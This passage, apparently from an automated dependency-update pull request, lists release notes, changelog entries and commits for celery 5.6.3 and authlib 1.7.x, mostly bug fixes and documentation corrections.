href=\"https://github.com/ChickenBenny\"\u003e\u003ccode\u003e@​ChickenBenny\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10108\"\u003ecelery/celery#10108\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix warm shutdown RuntimeError with eventlet\u0026gt;=0.37.0 (\u003ca href=\"https://redirect.github.com/celery/celery/issues/10083\"\u003e#10083\u003c/a\u003e) by \u003ca href=\"https://github.com/ChickenBenny\"\u003e\u003ccode\u003e@​ChickenBenny\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10123\"\u003ecelery/celery#10123\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix 10109 db backend connection health by \u003ca href=\"https://github.com/ChickenBenny\"\u003e\u003ccode\u003e@​ChickenBenny\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10124\"\u003ecelery/celery#10124\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDatabase Backend filter unsupport sql engine arguments with nullpool \u003ca href=\"https://redirect.github.com/celery/celery/issues/7355\"\u003e#7355\u003c/a\u003e by \u003ca href=\"https://github.com/ChickenBenny\"\u003e\u003ccode\u003e@​ChickenBenny\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10134\"\u003ecelery/celery#10134\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(beat): correct argument order in Service.\u003cstrong\u003ereduce\u003c/strong\u003e by \u003ca href=\"https://github.com/bysiber\"\u003e\u003ccode\u003e@​bysiber\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10137\"\u003ecelery/celery#10137\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: declare explicit read-only token permissions in workflow jobs by \u003ca href=\"https://github.com/Rohan5commit\"\u003e\u003ccode\u003e@​Rohan5commit\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10139\"\u003ecelery/celery#10139\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: 'boto3to' to 'boto3 to' by \u003ca href=\"https://github.com/cuiweixie\"\u003e\u003ccode\u003e@​cuiweixie\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10133\"\u003ecelery/celery#10133\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDatabase Backend: Add missing index on date_done (Fixes \u003ca href=\"https://redirect.github.com/celery/celery/issues/10097\"\u003e#10097\u003c/a\u003e) by \u003ca href=\"https://github.com/ChickenBenny\"\u003e\u003ccode\u003e@​ChickenBenny\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10098\"\u003ecelery/celery#10098\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edocs: fix typo in CONTRIBUTING.rst by \u003ca href=\"https://github.com/Rohan5commit\"\u003e\u003ccode\u003e@​Rohan5commit\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10141\"\u003ecelery/celery#10141\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRefer to Flower / Prometheus for monitoring by \u003ca href=\"https://github.com/WilliamDEdwards\"\u003e\u003ccode\u003e@​WilliamDEdwards\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10140\"\u003ecelery/celery#10140\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edocs: remove duplicated words in broker and routing docs by \u003ca href=\"https://github.com/Rohan5commit\"\u003e\u003ccode\u003e@​Rohan5commit\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10146\"\u003ecelery/celery#10146\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edocs: fix stale version reference and grammar in README by \u003ca href=\"https://github.com/kelsonbrito50\"\u003e\u003ccode\u003e@​kelsonbrito50\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10145\"\u003ecelery/celery#10145\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edocs: fix wording in Celery 5.3 worker pool notes by \u003ca href=\"https://github.com/Rohan5commit\"\u003e\u003ccode\u003e@​Rohan5commit\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10149\"\u003ecelery/celery#10149\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edocs: fix duplicated wording in 3.1 changelog entry by \u003ca href=\"https://github.com/Rohan5commit\"\u003e\u003ccode\u003e@​Rohan5commit\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10152\"\u003ecelery/celery#10152\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edocs: fix changelog typo in context manager wording by \u003ca href=\"https://github.com/Rohan5commit\"\u003e\u003ccode\u003e@​Rohan5commit\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10144\"\u003ecelery/celery#10144\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix/10096 worker fails to reconnect after redis failover by \u003ca href=\"https://github.com/ChickenBenny\"\u003e\u003ccode\u003e@​ChickenBenny\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10151\"\u003ecelery/celery#10151\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImprove on_after_finalize signal documentation by \u003ca href=\"https://github.com/Br1an67\"\u003e\u003ccode\u003e@​Br1an67\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10155\"\u003ecelery/celery#10155\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd non-commutative example to clarify partial arg ordering in canvas docs by \u003ca href=\"https://github.com/Br1an67\"\u003e\u003ccode\u003e@​Br1an67\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10157\"\u003ecelery/celery#10157\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemove redundant test_isa_mapping test (fixes \u003ca href=\"https://redirect.github.com/celery/celery/issues/10077\"\u003e#10077\u003c/a\u003e) by \u003ca href=\"https://github.com/daniel7an\"\u003e\u003ccode\u003e@​daniel7an\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10103\"\u003ecelery/celery#10103\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpgrade pytest-celery to \u0026gt;=1.3.0 and adopt PYTEST_CELERY_PKG build arg by \u003ca href=\"https://github.com/Nusnus\"\u003e\u003ccode\u003e@​Nusnus\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10162\"\u003ecelery/celery#10162\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemove deprecated args from redis get_connection call by \u003ca href=\"https://github.com/JaeHyuckSa\"\u003e\u003ccode\u003e@​JaeHyuckSa\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10036\"\u003ecelery/celery#10036\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ca href=\"https://redirect.github.com/celery/celery/issues/6912\"\u003e#6912\u003c/a\u003e rpc backend reconnection error by \u003ca href=\"https://github.com/ChickenBenny\"\u003e\u003ccode\u003e@​ChickenBenny\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10179\"\u003ecelery/celery#10179\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix NameError with TYPE_CHECKING annotations on Python 3.14+ (PEP 649) by \u003ca href=\"https://github.com/drichardson\"\u003e\u003ccode\u003e@​drichardson\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10165\"\u003ecelery/celery#10165\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edocs: Add elaboration on prefetch multiplier settings (worker_prefetch_multiplier) and worker_eta_task_limit by \u003ca href=\"https://github.com/tsangwailam\"\u003e\u003ccode\u003e@​tsangwailam\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10181\"\u003ecelery/celery#10181\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix O(K²) message bloat in a chain of chords by \u003ca href=\"https://github.com/Borzik\"\u003e\u003ccode\u003e@​Borzik\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10171\"\u003ecelery/celery#10171\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix mock connection interfaces to prevent \u003ccode\u003eTypeError\u003c/code\u003e during exception handling by \u003ca href=\"https://github.com/ChickenBenny\"\u003e\u003ccode\u003e@​ChickenBenny\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10178\"\u003ecelery/celery#10178\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(trace): dispatch chain/callbacks on dedup fast-path for redelivered tasks by \u003ca href=\"https://github.com/aurangzaib048\"\u003e\u003ccode\u003e@​aurangzaib048\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10159\"\u003ecelery/celery#10159\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eExtract \u003ccode\u003ereconnect_on_error\u003c/code\u003e to \u003ccode\u003eBaseResultConsumer\u003c/code\u003e by \u003ca href=\"https://github.com/ChickenBenny\"\u003e\u003ccode\u003e@​ChickenBenny\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10189\"\u003ecelery/celery#10189\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003epep 649 by \u003ca href=\"https://github.com/ericbuehl\"\u003e\u003ccode\u003e@​ericbuehl\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10187\"\u003ecelery/celery#10187\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix#9722 friendly status errors for CLI by \u003ca href=\"https://github.com/ChickenBenny\"\u003e\u003ccode\u003e@​ChickenBenny\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10190\"\u003ecelery/celery#10190\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edocs: clarify after_return behavior for retried tasks by \u003ca href=\"https://github.com/KianAnbarestani\"\u003e\u003ccode\u003e@​KianAnbarestani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10192\"\u003ecelery/celery#10192\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd compression header to message protocol docs by \u003ca href=\"https://github.com/Br1an67\"\u003e\u003ccode\u003e@​Br1an67\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10156\"\u003ecelery/celery#10156\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edocs: fix duplicated word in bootsteps comment by \u003ca href=\"https://github.com/Rohan5commit\"\u003e\u003ccode\u003e@​Rohan5commit\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10153\"\u003ecelery/celery#10153\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemove outdated autoreloader section from extending docs by \u003ca href=\"https://github.com/Br1an67\"\u003e\u003ccode\u003e@​Br1an67\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10154\"\u003ecelery/celery#10154\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/celery/celery/blob/v5.6.3/Changelog.rst\"\u003ecelery's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e5.6.3\u003c/h1\u003e\n\u003cp\u003e:release-date: 2026-03-26\n:release-by: Tomer Nosrati\u003c/p\u003e\n\u003cp\u003eWhat's Changed\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Fix Django worker recursion bug + defensive checks for pool_cls.__module__ ([#10048](https://github.com/celery/celery/issues/10048))\n- Docs: Update user_preload_options example to use click. ([#10056](https://github.com/celery/celery/issues/10056))\n- Fix invalid configuration key \u0026quot;bootstrap_servers\u0026quot; in Kafka demo ([#10060](https://github.com/celery/celery/issues/10060))\n- Fix broken images on PyPI page ([#10066](https://github.com/celery/celery/issues/10066))\n- Remove broken reference. ([#10071](https://github.com/celery/celery/issues/10071))\n- Removed --dist=loadscope from smoke tests ([#10073](https://github.com/celery/celery/issues/10073))\n- Docs: Clarify task_retry signal args may be None ([#10076](https://github.com/celery/celery/issues/10076))\n- Update example for Django ([#10081](https://github.com/celery/celery/issues/10081))\n- Make tests compatible with pymongo \u0026gt;= 4.16 ([#10074](https://github.com/celery/celery/issues/10074))\n- fix: source install of cassandra-driver ([#10105](https://github.com/celery/celery/issues/10105))\n- fix: register task cross-reference role in Sphinx extension ([#10100](https://github.com/celery/celery/issues/10100))\n- fix: avoid cycle detection in native delayed delivery ([#10095](https://github.com/celery/celery/issues/10095))\n- fix(asynpool): avoid AttributeError when proc lacks _sentinel_poll ([#10086](https://github.com/celery/celery/issues/10086))\n- fix dusk_astronomical horizon sign (+18 -\u0026gt; -18) ([#10121](https://github.com/celery/celery/issues/10121))\n- Fix/10106 onupdate col use lambda func ([#10108](https://github.com/celery/celery/issues/10108))\n- Fix warm shutdown RuntimeError with eventlet\u0026gt;=0.37.0 ([#10083](https://github.com/celery/celery/issues/10083)) ([#10123](https://github.com/celery/celery/issues/10123))\n- Fix 10109 db backend connection health ([#10124](https://github.com/celery/celery/issues/10124))\n- Database Backend filter unsupport sql engine arguments with nullpool [#7355](https://github.com/celery/celery/issues/7355) ([#10134](https://github.com/celery/celery/issues/10134))\n- fix(beat): correct argument order in Service.__reduce__ ([#10137](https://github.com/celery/celery/issues/10137))\n- ci: declare explicit read-only token permissions in workflow jobs ([#10139](https://github.com/celery/celery/issues/10139))\n- chore: 'boto3to' to 'boto3 to' ([#10133](https://github.com/celery/celery/issues/10133))\n- Database Backend: Add missing index on date_done (Fixes [#10097](https://github.com/celery/celery/issues/10097)) ([#10098](https://github.com/celery/celery/issues/10098))\n- docs: fix typo in CONTRIBUTING.rst ([#10141](https://github.com/celery/celery/issues/10141))\n- Refer to Flower / Prometheus for monitoring ([#10140](https://github.com/celery/celery/issues/10140))\n- docs: remove duplicated words in broker and routing docs ([#10146](https://github.com/celery/celery/issues/10146))\n- docs: fix stale version reference and grammar in README ([#10145](https://github.com/celery/celery/issues/10145))\n- docs: fix wording in Celery 5.3 worker pool notes ([#10149](https://github.com/celery/celery/issues/10149))\n- docs: fix duplicated wording in 3.1 changelog entry ([#10152](https://github.com/celery/celery/issues/10152))\n- docs: fix changelog typo in context manager wording ([#10144](https://github.com/celery/celery/issues/10144))\n- Fix/10096 worker fails to reconnect after redis failover ([#10151](https://github.com/celery/celery/issues/10151))\n- Improve on_after_finalize signal documentation ([#10155](https://github.com/celery/celery/issues/10155))\n- Add non-commutative example to clarify partial arg ordering in canvas docs ([#10157](https://github.com/celery/celery/issues/10157))\n- Remove redundant test_isa_mapping test (fixes [#10077](https://github.com/celery/celery/issues/10077)) ([#10103](https://github.com/celery/celery/issues/10103))\n- Upgrade pytest-celery to \u0026gt;=1.3.0 and adopt PYTEST_CELERY_PKG build arg ([#10162](https://github.com/celery/celery/issues/10162))\n- Remove deprecated args from redis get_connection call ([#10036](https://github.com/celery/celery/issues/10036))\n- Fix [#6912](https://github.com/celery/celery/issues/6912) rpc backend reconnection error ([#10179](https://github.com/celery/celery/issues/10179))\n- Fix NameError with TYPE_CHECKING annotations on Python 3.14+ (PEP 649) ([#10165](https://github.com/celery/celery/issues/10165))\n- docs: Add elaboration on prefetch multiplier settings (worker_prefetch_multiplier) and worker_eta_task_limit ([#10181](https://github.com/celery/celery/issues/10181))\n- Fix O(K²) message bloat in a chain of chords ([#10171](https://github.com/celery/celery/issues/10171))\n- Fix mock connection interfaces to prevent `TypeError` during exception handling ([#10178](https://github.com/celery/celery/issues/10178))\n- fix(trace): dispatch chain/callbacks on dedup fast-path for redelivered tasks ([#10159](https://github.com/celery/celery/issues/10159))\n\u0026lt;/tr\u0026gt;\u0026lt;/table\u0026gt; \n\u003c/code\u003e\u003c/pre\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/3f4d8d795ad128bd7430cc5dc174a802cded425c\"\u003e\u003ccode\u003e3f4d8d7\u003c/code\u003e\u003c/a\u003e Prepare for release: v5.6.3 (\u003ca href=\"https://redirect.github.com/celery/celery/issues/10221\"\u003e#10221\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/a989e8cf8876274b1f0612abffeeb2e9995ed321\"\u003e\u003ccode\u003ea989e8c\u003c/code\u003e\u003c/a\u003e fix: clear the timer while catch the exception (\u003ca href=\"https://redirect.github.com/celery/celery/issues/10218\"\u003e#10218\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/d06de5f047620b0ea2bdbdb3c0c56137b79ae9a1\"\u003e\u003ccode\u003ed06de5f\u003c/code\u003e\u003c/a\u003e Chore(deps): Bump nick-fields/retry from 3 to 4 (\u003ca href=\"https://redirect.github.com/celery/celery/issues/10213\"\u003e#10213\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/c3c19c31dc3e21f16d4d85a8ba8401a9223ace09\"\u003e\u003ccode\u003ec3c19c3\u003c/code\u003e\u003c/a\u003e Fix: prioritize request ignore_result over task definition (\u003ca href=\"https://redirect.github.com/celery/celery/issues/10184\"\u003e#10184\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/d23be53f6f3600d48df35a797c63eb1c7d4d4b97\"\u003e\u003ccode\u003ed23be53\u003c/code\u003e\u003c/a\u003e Remove outdated autoreloader section from extending docs (\u003ca href=\"https://redirect.github.com/celery/celery/issues/10154\"\u003e#10154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/ada2da7475a5fa9f9ad079149a5d6864634abc28\"\u003e\u003ccode\u003eada2da7\u003c/code\u003e\u003c/a\u003e docs: fix duplicated word in bootsteps comment\\n\\nSigned-off-by: Rohan Santho...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/f45f62beb3b16ae960944f8c97de13ccf15f2d0a\"\u003e\u003ccode\u003ef45f62b\u003c/code\u003e\u003c/a\u003e Add compression header to message protocol docs (\u003ca href=\"https://redirect.github.com/celery/celery/issues/10156\"\u003e#10156\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/9a270925546ed9d0ca0303fb5006edc86b705fd9\"\u003e\u003ccode\u003e9a27092\u003c/code\u003e\u003c/a\u003e docs: clarify after_return behavior for retried tasks (\u003ca href=\"https://redirect.github.com/celery/celery/issues/10192\"\u003e#10192\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/6ee6230cd80ef6c3e7482e1f4cd970fbb0629b23\"\u003e\u003ccode\u003e6ee6230\u003c/code\u003e\u003c/a\u003e Fix#9722 friendly status errors for CLI (\u003ca href=\"https://redirect.github.com/celery/celery/issues/10190\"\u003e#10190\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/a9a2d4cecaf0e58c401ad6f68f022afa19770ac2\"\u003e\u003ccode\u003ea9a2d4c\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/celery/celery/issues/10186\"\u003e#10186\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/celery/celery/compare/v5.6.2...v5.6.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `authlib` from 1.6.9 to 1.7.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/authlib/authlib/releases\"\u003eauthlib's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.7.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix the readme links by \u003ca href=\"https://github.com/azmeuk\"\u003e\u003ccode\u003e@​azmeuk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/886\"\u003eauthlib/authlib#886\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAllow non-recommended algorithms in ClientSecretJWT and PrivateKey by \u003ca href=\"https://github.com/azmeuk\"\u003e\u003ccode\u003e@​azmeuk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/887\"\u003eauthlib/authlib#887\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eValidate BCP47 language tags with a regex by \u003ca href=\"https://github.com/azmeuk\"\u003e\u003ccode\u003e@​azmeuk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/873\"\u003eauthlib/authlib#873\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix RFC7523 signing with non RSA keys by \u003ca href=\"https://github.com/azmeuk\"\u003e\u003ccode\u003e@​azmeuk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/884\"\u003eauthlib/authlib#884\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/authlib/authlib/compare/v1.7.1...v1.7.2\"\u003ehttps://github.com/authlib/authlib/compare/v1.7.1...v1.7.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.7.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix authlib.jose deprecation warning poping from _joserfc_helpers by \u003ca href=\"https://github.com/azmeuk\"\u003e\u003ccode\u003e@​azmeuk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/881\"\u003eauthlib/authlib#881\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix redirecting to unvalidated \u003ccode\u003eredirect_uri\u003c/code\u003e on \u003ccode\u003eInvalidScopeError\u003c/code\u003e  in \u003ccode\u003eOpenIDImplicitGrant\u003c/code\u003e and \u003ccode\u003eOpenIDHybridGrant\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/authlib/authlib/compare/v1.7.0...v1.7.1\"\u003ehttps://github.com/authlib/authlib/compare/v1.7.0...v1.7.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.7.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAuthorization and token endpoints request empty scope parameter management by \u003ca href=\"https://github.com/azmeuk\"\u003e\u003ccode\u003e@​azmeuk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/847\"\u003eauthlib/authlib#847\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport from Python 3.10 to 3.14 by \u003ca href=\"https://github.com/azmeuk\"\u003e\u003ccode\u003e@​azmeuk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/850\"\u003eauthlib/authlib#850\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAllow composition of AuthorizationServerMetadata by \u003ca href=\"https://github.com/azmeuk\"\u003e\u003ccode\u003e@​azmeuk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/853\"\u003eauthlib/authlib#853\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake require_oauth parenthesis optional by \u003ca href=\"https://github.com/azmeuk\"\u003e\u003ccode\u003e@​azmeuk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/855\"\u003eauthlib/authlib#855\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003eexpires_at\u003c/code\u003e behavior when its value is 0 by \u003ca href=\"https://github.com/azmeuk\"\u003e\u003ccode\u003e@​azmeuk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/854\"\u003eauthlib/authlib#854\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMigration to joserfc by \u003ca href=\"https://github.com/lepture\"\u003e\u003ccode\u003e@​lepture\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/852\"\u003eauthlib/authlib#852\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRP-initiated logout by \u003ca href=\"https://github.com/frohrlich\"\u003e\u003ccode\u003e@​frohrlich\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/849\"\u003eauthlib/authlib#849\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003eget_jwt_config\u003c/code\u003e by \u003ca href=\"https://github.com/lepture\"\u003e\u003ccode\u003e@​lepture\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/858\"\u003eauthlib/authlib#858\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(ci): Update PyPy version from 3.10 to 3.11 by \u003ca href=\"https://github.com/cclauss\"\u003e\u003ccode\u003e@​cclauss\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/863\"\u003eauthlib/authlib#863\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: remove \u0026quot;none\u0026quot; from default authlib.jose.jwt algorithms by \u003ca href=\"https://github.com/lepture\"\u003e\u003ccode\u003e@​lepture\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/860\"\u003eauthlib/authlib#860\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: normalize resolve_client_public_key method by \u003ca href=\"https://github.com/lepture\"\u003e\u003ccode\u003e@​lepture\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/861\"\u003eauthlib/authlib#861\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImplement rfc9700 PKCE downgrade countermeasure by \u003ca href=\"https://github.com/azmeuk\"\u003e\u003ccode\u003e@​azmeuk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/864\"\u003eauthlib/authlib#864\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse correct syntax for tox.requires in tox.ini by \u003ca href=\"https://github.com/alex-ball\"\u003e\u003ccode\u003e@​alex-ball\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/868\"\u003eauthlib/authlib#868\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSet client session User-Agent when fetching server metadata and JWKs by \u003ca href=\"https://github.com/alex-ball\"\u003e\u003ccode\u003e@​alex-ball\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/867\"\u003eauthlib/authlib#867\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: use the real application object for Flask by \u003ca href=\"https://github.com/nblock\"\u003e\u003ccode\u003e@​nblock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/869\"\u003eauthlib/authlib#869\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAccept the issuer URL as a valid audience by \u003ca href=\"https://github.com/azmeuk\"\u003e\u003ccode\u003e@​azmeuk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/865\"\u003eauthlib/authlib#865\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDon't nest InvalidTokenError extra attribute by \u003ca href=\"https://github.com/azmeuk\"\u003e\u003ccode\u003e@​azmeuk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/authlib/authlib/pull/872\"\u003eauthlib/authlib#872\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDocumentation overhaul by \u003ca href=\"https://github.com/azmeuk\"\u003e\u003ccode\u003e@​azmeuk\u003c/code\u003e\u003c/a\u003e in \u003ca 